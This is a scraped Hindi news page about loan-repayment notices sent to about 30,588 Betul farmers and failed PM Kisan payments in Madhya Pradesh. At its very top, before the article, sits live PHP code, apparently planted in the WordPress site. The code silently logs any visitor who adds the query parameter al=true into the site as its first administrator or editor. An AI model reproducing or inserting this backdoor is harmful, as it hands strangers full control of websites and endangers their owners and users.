// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); MP: बैतूल के किसानों में हड़कंप, ब्याज सहित चुकाना होगा 188 लाख का कर्ज – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

MP: बैतूल के किसानों में हड़कंप, ब्याज सहित चुकाना होगा 188 लाख का कर्ज

यह कर्ज किसानों को ब्याज सहित चुकाना होगा. जानकारी के मुताबिक, जिन किसानों को कर्ज चुकाने के नोटिस आए हैं, वे सभी पूर्व कमलनाथ सरकार की कर्जमाफी योजना में शामिल थे.

जिले के हजारों किसानों के बीच हड़कंप मचा हुआ है. सहकारी समितियों ने किसानों को कर्ज चुकाने का नोटिस जारी किया है. यह कर्ज किसानों को ब्याज सहित चुकाना होगा. जानकारी के मुताबिक, जिन किसानों को कर्ज चुकाने के नोटिस आए हैं, वे सभी पूर्व कमलनाथ सरकार की कर्जमाफी योजना में शामिल थे.

जानकारी के मुताबिक प्रशासन ने बैतूल के करीब 30 हजार 588 किसानों को कर्ज चुकाने के आदेश जारी किए हैं. इन किसानों ने 50 हजार से लेकर 2 लाख रुपए तक कर्ज लिया हुआ है. बताया जाता है कि 30 हजार 588 किसानों पर कुल 188 लाख का कर्ज बकाया है. सहकारी समितियों ने इन सभी किसानों को डिफॉल्टर घोषित कर दिया है. जांच के बाद इन सभी नोटिस दिए गए.

किसानों को नहीं मिलेगा खाद-बीज

गौरतलब है कि बैतूल जिले के 96 हजार से ज्यादा किसान कमलनाथ सरकार की कर्जमाफी योजना में शामिल थे. लेकिन, नए नोटिस मिलने से अब उनकी चिंता बढ़ गई है. बताया जाता है कि सहकारी समितियों ने इन्हें खाद-बीज देने से भी मना कर दिया है.
ट्रांजेक्शन फेल होने के कारण खातों में नहीं पहुंचा पैसा

पीएम किसान सम्मान निधि (PM Kisan Samman Nidhi) का पैसा सात लाख किसानों के खाते में नहीं पहुंच सका है. ट्रांजेक्शन फेल होने के कारण ऐसा हुआ. अनुमान है कि पटवारी से खाता नंबर लिखने में गलती या फिर आधार कार्ड में आई तकनीकी दिक्कत के कारण ट्रांजेक्शन (Transaction) फेल हुआ है.

देश में कई जगह आई दिक्कत

पीएम किसान सम्मान निधि की राशि खाते में नहीं आने की वजह से लाखों किसान अब परेशान हो रहे हैं. यह दिक्कत मध्य प्रदेश ही नहीं बल्कि देश के दूसरे राज्यों में भी सामने आई है. मध्य प्रदेश में हाल ही में पीएम किसान सम्मान निधि की 18 हजार करोड़ रुपए की सातवीं क़िश्त ट्रांसफर की गई थी. यह राशि सीधे किसानों के खातों में डाली गयी थी. लेकिन मध्य प्रदेश के सात लाख 29 हजार किसान के खातों में किश्त की राशि नहीं पहुंची है.

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]